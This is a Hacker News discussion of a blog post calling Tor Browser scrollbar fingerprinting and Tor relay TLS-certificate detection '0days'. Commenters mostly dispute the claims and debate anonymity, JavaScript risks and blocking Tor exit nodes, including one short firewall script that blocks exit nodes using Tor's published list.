Hacker News new | past | comments | ask | show | jobs | submit login
Tor 0day: Stopping Tor Connections (hackerfactor.com)
227 points by a_m0d on July 23, 2020 | hide | past | favorite | 88 comments



Both of these vulnerabilities are bogus.

1. "using JavaScript, you can identify the scrollbar width [...] so an attacker can identify the underlying operating system"

Using JavaScript, you can simply ask Tor Browser what platform it's on using navigator.userAgent, and it will tell you the truth because lying breaks e.g. websites' custom key combinations. Tor Browser will however attempt to anonymize the platform in passive indicators, i.e. HTTP User-Agent: https://blog.torproject.org/new-release-tor-browser-801 (search for "User Agent")

(EDIT) This was too dismissive, because scrollbar width differences are more fine-grained than platform differences: https://bugzilla.mozilla.org/show_bug.cgi?id=1397996#c5

2. Blocking entry node connections:

"Checking every network connection against every possible Tor node takes time. This is fine if you have a slow network or low traffic volume, but it doesn't scale well for high-volume networks."

If you can muck around in TLS cert fields in real time, you can look up an IP address in a hash table...

"Second, the list of nodes changes often. This creates a race condition, where there may be a new Tor node that is seen by Tor users but isn't in your block list yet."

Oh no! (clutches pearls)

Not to say that it isn't worthwhile to tidy up the TLS fields some more, but hyping this as a zeroday is absurd.


Yeah I totally agree, especially with the blocking entry nodes part.

There are many other ways to detect TOR connections or nodes and block them. Theres enough that there are a whole set of ways of obfuscating traffic called pluggable transports: https://trac.torproject.org/projects/tor/wiki/doc/AChildsGar...


Also, it seems to me that whatever they do to make the TLS handshake and certificate look more like a typical web server, they would never be able to make it exactly match. Tor connections could still be identified by simple things like the self-signed certificate, the random hostname, the hostname<->IP mismatch, and so on.

Trying to fix this would be a never-ending losing battle, I can understand why the Tor project aren't that interested in changing things.


Wrt #1, I think the issue is that scrollbar size makes it easier to tell one Tor user apart from another in the Tor browser, not that you can determine they are running in the Tor browser (or even know their platform from a common fixed set). For most users of Tor and the Tor browser, simply checking that they are coming from a publicly known list of exit node IPs is enough (or if they are already hitting an onion service, then it's obvious).


I'd definetely consider Tor Node Fingerprinting (2nd issue) to be an important issue. Nonetheless, both issues have been _accepted_ as those by Tor Maintainers, yet they failed to act appropriately.


> I'd definetely consider Tor Node Fingerprinting (2nd issue) to be an important issue.

Why? If someone knows I'm running TOR, I guess that's not great, but I don't really see the issue.


Is it going to get you in trouble if anybody finds out?


I can't see how this is a "0day".

This post talks about how you can identify a running Tor when you connect to the (operator-assigned, public) relay port. You can only "see" these TLS certificate details when you are connecting to the relay yourself. This means this does not allow network operators to detect traffic going to Tor nodes, or in-between nodes, let alone identify users or deanonymize anyone: To external observers, such traffic looks like typical browser TLS traffic.

So, what this does is allow you to identify Tor nodes, which is by definition not a problem for all Tor relays except bridges, which should not be as easily discoverable by a network scan. The problem has been known before, and work as been done so you can now run a Tor bridge without this problem. As this problem has been publicly discussed and outlined in the very first design documents, it cannot be called a "0day", even if it was more problematic than it actually is.

Tor came up with the concept of "pluggable transports" to address this very successfully, which allows clients and entry bridges to basically make Tor traffic look like anything you want.


Security is in the eye of the application. Unauthenticated editing isn't an exploit on Wikipedia but it would be on the CDC's website

In this case the fact that a user is using tor is considered protected information meaning any exposure of that is in fact a info leak vulnerability


The "fact that a user is using Tor" is not discussed in the post. There is zero connection between how Tor nodes generate their TLS certificates and whether or not you can detect that a user is using Tor. All you can do with this information (which is not a secret but a well-discussed tradeoff with no better option) is to identify Tor relays, which are already public.


tor will never be secure if you're running js enabled. trying to achiveve that is way out of scope of the project:

https://support.torproject.org/tbb/tbb-34/


The author of this blog strongly comes across as a person who understands a good deal about finding vulnerabilities, but doesn't really understand the tradeoffs being made in maintaining usable anonymity software such as the Tor browser.

The reported scroll bar width vulnerability is his strongest case. He rightly got a bounty for it. But it's relatively hard to fix, and until recently, the Tor browser also just leaked your window size via Javascript. But they're getting there, slowly.

However, the story about public bridge certificates is pretty unjustified. The response he got from the Tor Project is completely clear, and his proposed solution in trying to impersonate traditional PKI simply won't work against even mediocre attackers. Furthermore, bridge enumeration as a systemic attack might be a problem against censorship systems, but can't rightly be called a '0day'. Private bridges (https://bridges.torproject.org) also solve a lot of the problem.

In the linked ticket, you clearly see that they are trying pretty hard to find a sponsor willing to fund the solution.


> and until recently, the Tor browser also just leaked your window size via Javascript.

Though this was why Tor would always open in the same window size. But ya, that all fell apart if you maximized.

When did they fix “the leak” itself? Wouldn’t that require intercepting the JavaScript call in the same way that the scroll bar size issue could be fixed?


I believe they implemented panels inside the browser window that force the window size to be different reported values.


It's called "letterboxing", and rounds the window size to the nearest 200x100 px when maximized, I think. So while it does make you slightly less unique than just maximizing normally would, that anonymity set is still potentially smaller than the set that can fit everyone, namely the 1000x1000 default. There are methods of detecting screen resolution using CSS that don't require JavaScript, so blocking JavaScript doesn't necessarily protect you from this fingerprinting method.


Fascinating to realize that CSS can do that. I guess it does it by “calling” x.png 1024 times and y.png 768 times? Or running some loop to call 1024x.png and 768y.png...


No loop necessary, maybe just a set of @media rules with e.g. custom .png resources: https://developer.mozilla.org/en-US/docs/Web/CSS/@media


Could you expand on "his proposed solution in trying to impersonate traditional PKI simply won't work against even mediocre attackers" ? How would you defeat his proposed solution?


As the Tor Project itself already notes in its reply, it's not feasible "to try to imitate normal SSL certs because that's a fight we can't win (they will always look differently or have distinguishers, as has been the case in the pluggable transports arms race)."

Even if the certificate is valid, there are lots of other distinguishing factors. You can go as far as timing attacks. As the answer alludes to, they have an entire project around obfuscated transports primarily for clients and private bridges. [1]

But there's no need for obfuscation here as the ORPort can 'simply' be closed, if it wasn't such a hassle to actually implement.

[1] https://gitweb.torproject.org/torspec.git/tree/pt-spec.txt


> The bug is simple enough: using JavaScript, you can identify the scrollbar width.

I thought it was accepted and strongly emphasized that running JavaScript in a Tor environment was insecure and could leak information in all sorts of ways, which is why Tor Browser came with NoScript enabled by default.

Is that no longer the case? Is there now an expectation that you should be able to safely run JS in Tor Browser without risk?


Javascript is unfortunately a major part of the web. In terms of Tor's core goals, I think it's preventing the leaking of IP information and overcoming censorship. Preventing websites from identifying a Tor browser is probably a secondary goal.

A website operator can already get refreshed lists of Tor exit nodes and simply block them. Your ISP/government can already see that there's Tor traffic coming from your house, and probably "match" at least some activity with an exit node.



I don't understand this bit:

> But there's a third issue: websites can easily determine whether you have allowed JavaScript for them, and if you disable JavaScript by default but then allow a few websites to run scripts (the way most people use NoScript), then your choice of whitelisted websites acts as a sort of cookie that makes you recognizable (and distinguishable), thus harming your anonymity.

How would this work exactly? And if it did work, wouldn't it at the very worst only work on sites for which you had enabled JS? I.e. sites that you had already essentially conceded your anonymity on by choice?

I don't see this as a worthy argument for enabling JS by default and destroying users' anonymity without custom configuration.


You just let the javascript send a heartbeat ping. If you don't receive the ping but served the page you can determine that the user agent did not execute the javascript.


Sure, but the comment mentions that you would use the 'set of websites that are whitelisted' as an identifier... your method can only check the site you are currently on, it doesn't give you information on if other websites have been whitelisted or not.


AFAIK NoScript whitelists don't respect first-party isolation (so a JS-enabled website can be included in a JS-disabled website), which makes it a relatively simple coordination problem between website A and B (possibly automated by a third-party tracker included in both A and B).

In any case, first-party isolation can be subverted: https://news.ycombinator.com/item?id=17947605


Yes, with coordination it is possible. I was thinking of the non-coordination issue.


You are not able to safely run JS in Tor Browser, but JS is enabled by default.


Iirc, they have been allowing scripting on HTTPS sites by default for some time now.


>Checking every network connection against every possible Tor node takes time. This is fine if you have a slow network or low traffic volume, but it doesn't scale well for high-volume networks

What? I can't tell if this is sarcastic or not. There's only around 3000 tor entry nodes[1]. This is orders of magnitude smaller than the number of entries in the internet routing table, which is around 800k. This means at the worst case, if you're an ISP, you can block tor nodes at the router level with virtually zero impact.

[1] https://onionoo.torproject.org/details?search=flag:Guard%20r...


It’s no problem, he has some regexs you can put in your DPI system to catch the connections instead. Regex is cheap right? Especially when it is long and complex.


It's like people haven't invented a Bloom filter yet so you can add it in front of a hash table....


> "After a lot of back-and-forth technical discussions, the Tor Project's representative wrote, "I'm a bit lost with all this info in this ticket. I feel like lots of the discussion here is fruitful but they are more brainstormy and researchy and less fitting to a bug bounty ticket." They concluded with: "Is there a particular bug you want to submit for bug bounty?" In my opinion, describing a vulnerability and mitigation options is not "brainstormy and researchy". To me, it sounds like they were either not competent enough to fix the bug, or they were not interested. In any case, they were just wasting time."

This plus the other descriptions/responses from the project in his post makes me think the project has attracted a lot of people that aren't programmers or can't actually do the valuable work of fixing the thing (though I'd be interested in seeing the specific ticket).

I'd guess that projects like Tor that interest people outside of strict programmer types have this as a bigger issue.

The result is you end up with a lot of people filing tickets and writing emails, but very few actually doing work to fix things because they don't know how. The few that could figure it out, are probably over extended. Having non-programmers interested in helping isn't necessarily a bad thing since good support people help make it easier to fix issues, but it can become bad if support people bias to closing issues because they can't fix them and closing them becomes the goal.

Tor does have some obfuscation proxies (called pluggable transports) to try and disguise the traffic to make it harder to block (there were videos a few years ago when I looked into how Tor worked that talked about this, the traffic is disguised as VOIP among other things). I know China blocks Tor by blocking all the bridge nodes it can find (both public and private) and by using the tricks he describes to slow or stop identified traffic. I think the head of the project cares about these issues.

Not an easy problem to fix, they probably need more programmers. Maybe a direct focus on these issues would help, but it could be they're focused on problems of similar or worse severity (hard to know).


I think the author’s problem is that he finds vulnerabilities thinking outside the box. Traditionaly vulnerabilities exist when you can inject payloads, get access to somewhere you don’t have access to.

His points are valid, and these are vulnerabilities. However they seem like feature requests, rather than being focused on a technical vulnerability (for example use after free).


I’m sorry but to call these minor issues ‘zero day vulnerabilities’ is a bit rich.

I’ll wait and see if there are any real vulnerabilities in the queue.


> (Many users think that Tor makes them anonymous. But Tor users can be tracked online; they are not anonymous.)

Being tracked and anonymous feel like two distinct issues. If you were to only see a hash of my username, you could track me, but you couldn't identify me with it. Definitely something you'd want TOR to stop, but I think that's pretty important.

The other vulnerability is that websites can identify that a user is using TOR. My understanding is that this has always been fairly trivial?

It feels like the real 'story' here is that the TOR project hasn't been grooming their bug bounty program, and so there may be more serious bugs lurking.


> If you were to only see a hash of my username, you could track me, but you couldn't identify me with it.

Pseudonymous is the word for that sort of "tracking". Tracking just means being tracked, no matter if they use the real name or a hash of it or fingerprinting/metadata like IP + user agent string + installed fonts.


Yeah, that's my point. Anonymity to me implies that you can not determine my true identity. That property still holds here. What doesn't hold is that you can not determine that I am the same person in multiple locations - a very significant issue, but a much less serious one.


One feeds into the other strongly, though. The odds of an adversary de-anonymizing you go up the more activity the adversary can see. Also, we should look at your anonymity on a per-site/session basis, and if de-anonymization on one site breaks your anonymity on other sites, that is bad.


I fully agree that it is bad and a legitimate issue. As I said, "a very significant issue".


Suppose you visit facebook via tor and log in. If you can be traced across the web, then your real name can now be attached to all your activity.


>If you can be traced across the web, then your real name can now be attached to all your activity.

But that's not how tor works. It's not like a VPN where all your traffic comes out of one node. So if even if you logged into facebook using tor browser, it won't be able to correlate your other tor browsing activities. Even third party cookies won't work because tor browser has third party isolation enabled.


> >If you can be traced across the web, then your real name can now be attached to all your activity.

> But that's not how tor works. It's not like a VPN where all your traffic comes out of one node. So if even if you logged into facebook using tor browser, it won't be able to correlate your other tor browsing activities. Even third party cookies won't work because tor browser has third party isolation enabled.

Except that the OP discussed a technique that exposed an attribute of the user's setup that (when combined with other such techniques) allows unique (albeit pseudonymous) identification of the user across requests and sessions (this is called fingerprinting). Add in correlation of the pseud identifier with a real-world identity via use of FB, and the user would be totally hosed.


Wait.. you are logging into facebook and using your real name?

Step 1: Log into tor.

Step 2: Create facebook account using a fake name

Step 3: Don't add anyone you know in real life as a friend. Best not to search for friends.

Facebook will not connect you now.


What is the point of using Facebook then?


One example would be to join groups that you don't want associated with your IRL identity. Another would be as part of a phish test while doing a pentest against an organization you're working for.

Or... a bazillion other illegitimate reasons ;).


Yes, totally. As I said, it's a very significant issue, but it requires a separate ability to tie the tor identity to the user's real identity.


As a person who has, over the years, been recommending Tor and defending it against people claiming it's backdoored and useless, I'm disappointed. Can anybody here on HN give information on how some Tor alternatives and projects with similar goals are holding up?


There's really no reason to be disappointed. The post above both isn't about any real vulnerabilities in the service, and does not have any real solutions to the problems posed.


I'm not realy using it much but i2p[0] has been around for a while. It's Java though as all other projects like this in case you have anything against it.

[0] https://geti2p.net/en/


IIRC the main issue with I2P is that it doesn't natively offer access to traditional websites the way Tor does. You can configure your browser to connect to a remote HTTP proxy over I2P and access the web that way, but that requires you to find such a proxy first (preferably several such proxies, each with multiple users, so that your traffic across multiple sessions can't be correlated by using the outproxy IP), and setting it up is a lot more complicated than Tor's method of "download Tor browser, click run".



I'm not sure there is a good alternative. Most of the alternatives are built with Java, which (considering tor isn't considered safe with Java enabled) doesn't seem like an improvement.

Is there an alternative that's performant and built with a decent language? Or do the good ones just get snuffed out?


Java is not the same thing as JavaScript


People always say I'm being pedantic when I point that out, but I think it's a really important distinction to make to someone who's not aware, especially in the context of their security.


There's a line about pedantic meaning "you're right but I don't like it", but Java vs JS isn't even close! They're both OO programming languages in the C-like family with garbage collection, but they have completely different execution models, runtimes, usecases, and implementations; their close naming is a bug.


Java is significantly safer than C which Tor is written in.


Browsing over Tor, I cannot read the article. Instead the entire page source is:

  Banned
...


I believe they are demonstrating one of their 0days. Easily identifying tor traffic based on the packet.

  0Day #1: Blocking Tor Connections the Smart Way
  
  There are two problems with the "block them all" approach. First, there are thousands of Tor nodes. Checking every network connection against every possible Tor node takes time. This is fine if you have a slow network or low traffic volume, but it doesn't scale well for high-volume networks. Second, the list of nodes changes often. This creates a race condition, where there may be a new Tor node that is seen by Tor users but isn't in your block list yet.
  
  However, what if there was a distinct packet signature provided by every Tor node that can be used to detect a Tor network connection? Then you could set the filter to look for the signature and stop all Tor connections. As it turns out, this packet signature is not theoretical.


The packet signature thing is maybe sort of interesting, but it's not hard to block Tor exit nodes; Tor themselves makes this easy:

    #!/bin/bash
    addresses=$(curl -s https://check.torproject.org/torbulkexitlist?ip=<your-server's-ip> | sed '/^#/d')

    if [ -n "$addresses" ]; then
        /sbin/ipset flush tor
        echo "$addresses" | while read address; do
            /sbin/ipset -q -A tor "$address"
        done
    fi
Add that to a cron job and your form abuse traffic falls off a cliff.


If you feel it necessary to block Tor nodes in some way, I think it's better to only block non-safe methods.

Personally, I don't do it, but I understand why it's appealing. I see it as a personal decision (its your website after all) and not morally wrong as some see it.

I once talked to someone working security for a Canadian government agency. They considered it against their charter and/or illegal to block tor nodes, because it could be blocking legitimate access for Canadian citizens potentially in distress, much to the chagrin of their downstream customers (other agencies). I thought that was pretty interesting.


I think there are also some Canadian court cases protecting the right to speak anonymously over the internet. It's an area where I think our government is going a pretty decent job (as governments interacting with new fangled technologies go)


Yeah, I don't remember the exact reason they didn't consider it a possibility, but I seem to remember the guy saying it would save him a headache but it wasn't in the cards and that they had to explicitly configure some solution they were using (perhaps cloudflare?) to not DoS the traffic.


Yeah. I'm sympathetic towards the Tor project in general, but it's also a huge source of nuisances and almost 0% legitimate traffic (in my case). As a beleaguered one-man sysadmin who also wears a full-time dev hat, I just don't have the resources available to build out a more clever rule-based filter for Tor traffic. This approach took me all of about 10 minutes to figure out and deploy across my little network of servers, and it made an entire stream of daily emails disappear immediately.

If I were fortunate enough to be part of a larger team, I'd advocate for exactly what you're suggesting.


I was thinking that Apache / Nginx blocking based on IP match and HTTP method is likely approximately equivalent complexity.

Also CDNs generally offer this if you use one.


Not quite, unfortunately. Apache's not all that nimble; setting up rewrites for a handful of ips-and-methods is pretty easy, but it doesn't have a built-in way to use an external list of ips (that I'm aware of). I just checked, there are over 1300 tor ips in the result set currently.

I could write a conf.d file to be included in each vhost, and write a script to generate a large rewrite file nightly and "apachectl graceful" it afterward, and that would probably work... but I expect that will have a measurable impact on response times and, again, I'm not hosting governmental sites or anything that could reasonably be considered vital to the health and well-being of innocent tor users.


The article also mentions banning ip ranges and it's disadvantages. The described detection of Tor traffic seems to be more bullet proof and performant.

Hopefully the Tor devs consider the proposed enhancements to make the traffic less vulnerable to identification. As he already digged into the source code, maybe it's easier when he submits a PR for a higher chance to fix the issue.


I believe the article mentions that, but also notes your method works for low-traffic situations. The 0day is a high-performance alternative.


ipset is very fast (http://web.archive.org/web/20160514091316/http://daemonkeepe...).

The author's approach requires examining a certificate to see if it matches a pattern that may or may not change in the future.


That identifies Tor clients, not connections from Tor exit nodes to servers.


That sounds like it's only able to detect traffic client<->tor node or tor node<->tor node. exit node<->server doesn't have that generated certificate.


Sorry, this seems bogus. There are a lot of ways to block Tor connections, and Tor doesn't try to make it particularly hard to identify ordinary entry nodes. That's what bridge nodes are for, if you need it.


Bugs and 0days aside, is not the writer's main issue here a communication problem with the Tor project?


I don’t know why the Tor browser allows JavaScript to be enabled by default to begin with.

I don’t allow JavaScript to run on my mobile browser because of the disturbing crash logs in WebKit in the few times I have enabled JS.


Could someone in the know inform me as to whether or not my knee jerk reaction of "couldn't this individual possibly contribute to the Tor project instead?" is warranted?


They are contributing to the Tor project by sending detailed vulnerability reports. As for demanding that they fix/upstream changes themselves, then yes, that's likely too big of an ask, as even these reports are a gift. Tor has paid employees. "PRs welcome, wontfix" is not acceptable for security vulnerabilities in a security product.


To add to this, when reporting bugs (security or otherwise) I regularly feel like it's not worth my time to fix them because it takes me 2 hours to try to get the code to compile in the first place, sometimes you need to sign legalese to be allowed to help them, then I still need to figure out what the project's structure is and decide on how to best fix it (perhaps discuss it with the maintainer(s)), and then I haven't even started writing code yet. Meanwhile, I know that when maintaining my own software, it takes me 30 seconds to open up the project and I'll be literally 5 times faster working on a fix with all the context that is in my head and usually don't need to consult with others.

It's like if you kept trying to fix other people's cars when you know only the principles of a combustion engine, own an electric motorcycle yourself, and those cars would be very different from each other: I'd much rather someone does it who actually knows what they're doing, it would save all parties a lot of trouble. Diagnosing problems very specifically should already help them a lot of the time they would otherwise have to put in.


> it takes me 2 hours to try to get the code to compile in the first place

And then the tests won't pass on master!


Tell me about it. Instructions working on the first attempt on a standard Debian system is quite rare. Bigger projects with more contributors put more work into making it work, but also have more complex processes, so the result is that it's almost always trouble. Or they're simply more complex than necessary: no I don't want to download 12GB of IDE, SDK/compiler, emulated operating systems, and custom versions of dependencies installed system-wide in order to compile and run this project, I just want the code and dependencies in the local folder and apt install a compiler so I can simply build the apk and adb install it on my phone without screwing up my system or having to setup a new container/VM for the purpose.


If someone gives you a gift, you are not forced to accept it. Tor paid employees probably have something else to work onto, given that they are paid my Tor's money, not by the bug reporter's money. Frankly, the issue about blocking connections is pretty useless: the author themselves admit that the underlying issue cannot be fixed, since the list of relays is public. And it's not a security issue anyway: of course your traffic carrier will always be able to drop your packets, but nobody consider this a security issue for any other application.

So they are basically reporting trivial issues (this is trivial, at least, I cannot judge for the others they say they have) and pretending that people paid by someone else now care just about that. Doesn't look like very smart.


This sort of reminds me of Burning Man Project. There is money, full time staff and a lot of attention paid to the main product. But a lack of excellent results.

I generally chalk this up to leadership issues.


> Unfortunately, sometimes companies are non-responsive. At that point, I have a few options. I can sell the vulnerability to someone else who will certainly exploit it. I can just let it sit -- maybe the bug will be fixed by coincidence or become obsolete, or maybe I'll find another use for it later. (I have a large collection of sitting vulnerabilities, some dating back decades.)

This sounds so interesting to me to hear about. Can anyone recommend a podcast where like-minded engineers discuss things like this? I'd love to vicariously live through their hacking adventures.


Sitting on bugs is just being an asshole, not a great adventure. In most cases there really isn't that much to tell anyway: you find a bug, either on your own or in a customer project, and for some reason it doesn't get fixed. Perhaps management accepts the risk and you're bound by an NDA. Perhaps you plan to make a patch so people can also update when you publish but you haven't found the time for the patch and so it continues (I know of a denial of service in nextcloud like this: it's trivial to find (go ahead) and out of scope for their security program so nextcloud tells us it's a wontfix; we're still meaning to release a patch but it has been two months now, though it's only denial of service anyway). If the bug just so happens to be useful in the future, it's like using a public bug except you're the only one knowing it and you can feel real proud of yourself for putting everyone at risk during that time.


I have gotten the impression over the last few years that the Tor Project has embraced social justice and diversity to the detriment of their software.


I find that when I come across comments or jokes that might expose biases, rather than interrogate the person you can expose those by just asking the simplest questions, the ones that seem too obvious to ask. When someone says a joke that might be described as biased, usually using a more particular word, just ask them to explain the joke. That usually is more revealing than calling its speaker a name.

So, I don't want to infer your opinions, but I want to ask: what about social justice and diversity is to the detriment of their software?


People said the same about Mozilla, but FF is doing just fine.


It's more important to support FF for a million reasons than not support them because of their internal culture.

Remove those reasons and I would prefer a more open culture and prefer less toxic and would switch browsers to support single thought vs group think.


This is led some credence by the fact that the Tails website links to riseup.net, which hosts Rose City Antifa.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: